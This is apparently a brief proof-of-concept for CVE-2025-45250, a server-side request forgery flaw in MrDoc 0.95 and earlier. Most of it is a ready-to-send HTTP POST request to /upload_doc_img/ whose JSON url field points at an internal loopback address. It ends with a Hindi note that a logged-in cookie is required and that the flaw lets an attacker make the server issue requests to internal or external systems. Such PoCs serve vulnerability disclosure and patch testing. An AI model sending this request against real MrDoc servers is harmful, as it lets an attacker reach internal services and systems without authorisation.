
CVE-2025-45250 POC
MrDoc <=0.95 is vulnerable to Server-Side Request Forgery (SSRF) in the validate_url function of the app_doc/utils.py file.
POST /upload_doc_img/ HTTP/1.1
Host: ip:port
Accept-Encoding: gzip, deflate
DNT: 1
Cookie: your cookie
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Edg/134.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Upgrade-Insecure-Requests: 1
Content-Type: application/json
{
"url": "http://127.0.0.2"
}
इस कमजोरी को दोहराने के लिए, आपको कुकी मान प्राप्त करने के लिए लॉग इन होना चाहिए। यह एक हमलावर को सर्वर को आंतरिक या बाहरी सिस्टम पर दुर्भावनापूर्ण अनुरोध करने के लिए धोखा देने की अनुमति देता है।